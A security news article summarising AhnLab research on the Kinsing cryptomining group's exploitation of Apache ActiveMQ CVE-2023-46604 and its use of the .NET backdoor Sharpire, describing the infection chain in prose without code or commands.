Kinsing Cryptominer Exploits Apache ActiveMQ RCE (CVE-2023-46604), Adds Sharpire Backdoor for Multi-Stage Intrusion

The AhnLab Security Intelligence Center (ASEC) has confirmed that the Kinsing threat actor — also known as H2Miner — continues to actively exploit known vulnerabilities, particularly CVE-2023-46604 in Apache ActiveMQ, to distribute cryptocurrency miners and remote-access tools across both Linux and Windows systems.

The campaign has recently expanded beyond its usual cryptomining activity, now involving multiple post-exploitation frameworks such as Cobalt Strike, Meterpreter, and PowerShell Empire, alongside a new .NET-based backdoor named Sharpire.

First identified by Alibaba Cloud Security in 2020, Kinsing is known for targeting misconfigured or unpatched servers to deploy XMRig miners. Over the years, the group has adapted its tactics to exploit several major vulnerabilities, including Log4Shell (CVE-2021-44228), misconfigured Docker API ports, and now, ActiveMQ’s remote code execution flaw (CVE-2023-46604).

AhnLab explains: “The Kinsing threat actor targets the Docker daemon API port with a misconfiguration, while for Redis, they exploit the remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604).”

Aside from vulnerability exploitation, Kinsing also leverages stolen SSH credentials during lateral movement to spread malware internally across compromised networks.

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, allowing unauthenticated attackers to run arbitrary commands on affected servers. The flaw resides in how OpenWire protocol handles serialized class types, which can be manipulated to load attacker-controlled XML configuration files.

AhnLab’s analysts noted that “if an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system.” The vulnerability has already been exploited by several major groups, including Andariel, HelloKitty ransomware, and Mauri ransomware, but AhnLab’s latest research highlights Kinsing’s continued and evolving use of the exploit.

In recent attacks observed in South Korea, Kinsing has deployed a chain of downloader malware to deliver secondary payloads. The infection begins when the vulnerable ActiveMQ Java process executes a malicious XML configuration file, which triggers msiexec.exe to download and install MSI-based malware. These “stager” components establish persistence and connect back to the attacker’s infrastructure for further payload delivery.

The Kinsing operation continues to maintain cross-platform capabilities. In addition to the Windows-based malware chain, AhnLab identified a Bash script targeting Linux environments, designed to configure the XMRig miner for illicit cryptocurrency mining. The script modifies the miner’s configuration file to include Kinsing’s wallet address, as confirmed by AhnLab’s telemetry and previous Fortinet research.

Perhaps the most notable finding in AhnLab’s report is the identification of Sharpire, a .NET-developed backdoor that supports PowerShell Empire, an open-source post-exploitation framework. Sharpire expands Kinsing’s toolkit for remote control, reconnaissance, and lateral movement.

AhnLab’s analysis shows that Sharpire can execute PowerShell commands, manage files, query network configurations, and even reboot or shut down compromised systems.

The malware supports over a dozen command functions, including “Execute PowerShell command,” “List directory,” “Check network configuration information,” and “Query current user.”

By integrating Cobalt Strike, Meterpreter, and Sharpire, Kinsing now exhibits capabilities more aligned with multi-stage intrusion and ransomware operators, signaling a clear escalation in threat sophistication.

Rate this post

Related Posts:

Found this helpful?

Leave a Reply Cancel reply